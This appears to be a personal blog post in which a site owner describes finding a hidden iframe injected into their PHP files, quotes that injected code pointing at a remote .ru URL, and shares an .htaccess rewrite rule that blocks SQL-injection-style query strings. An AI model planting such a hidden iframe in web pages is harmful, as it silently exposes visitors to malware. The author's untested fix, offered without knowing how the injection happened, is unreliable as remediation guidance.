Html Injection

malware
Yesterday I got a message from google about my adwords account having been suspended. Reason being a suspected malware infection on my site. I Then checked my site code and realised that yes i had been compromised the code below had somehow been added to my php files:

<div style=”display:none”><iframe width=415 height=797 src=”http://age-inf.ru:8080/index.php” ></iframe></div><div style=”display:none”></div><div style=”display:none”>

From the above, it seems this loads a page in the background within an iframe without the users consent, i dont even want to know what happens when you load that url. Anyway for those of you who might find themselves in a similar situation, I managed to solve this by altering my .htaccess file and adding the contents below to it:

RewriteCond %{QUERY_STRING} ^.*(;|<|>|’|”|)|%0A|%0D|%22|%27|%3C|%3E|%00).*(/*|union|select|insert|cast|set|declare|drop|update|md5|benchmark).* [NC]
RewriteRule .* – [F]

Some people are suggesting playing around with mod_rewrite but I’m not too sure if thats the safest way to deal with it. One question remains, how was the html injected in the first place?